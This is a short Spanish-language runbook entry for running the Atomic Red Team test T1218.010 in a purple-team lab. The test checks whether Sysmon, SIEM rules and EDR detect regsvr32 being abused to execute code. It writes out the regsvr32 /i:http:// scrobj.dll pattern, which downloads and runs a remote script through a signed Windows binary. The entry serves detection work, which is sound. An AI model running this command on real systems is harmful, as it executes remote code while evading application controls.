Atomic Red T1218.010
Invoke-AtomicTest T1218.010
Ejecuta el test atómico de regsvr32 (T1218.010) con Atomic Red Team, validando la detección del abuso de binarios firmados para ejecutar código.
Ejecútalo en el laboratorio de purple team cuando quieras validar la detección del living off the land: el atómico T1218.010 usa regsvr32 (el binario firmado de Windows) para ejecutar código (regsvr32 /s /n /u /i:http://... scrobj.dll) y el equipo verifica qué detectó — Sysmon Event 1 (regsvr32 con los argumentos), las reglas del SIEM, el EDR. Es la validación de la detección del LOLBin: la técnica real del atacante que usa los binarios legítimos. En el purple teaming, el atómico valida las reglas de regsvr32 y el resultado alimenta la matriz.
No lo ejecutes en producción: el atómico ejecuta código (la descarga y ejecución del script) — el laboratorio es el sitio. El ruido se planifica. Y ojo: el atómico valida la detección de la variante concreta (regsvr32 con scrobj.dll por HTTP) — las otras variantes (local, DLL) tienen otros atómicos; la cobertura se valida por variante. El test necesita el acceso a la URL del atómico (o el servidor local): sin el recurso, el atómico falla. La detección de los argumentos de regsvr32 (el /i:http) es la clave de la regla que se valida.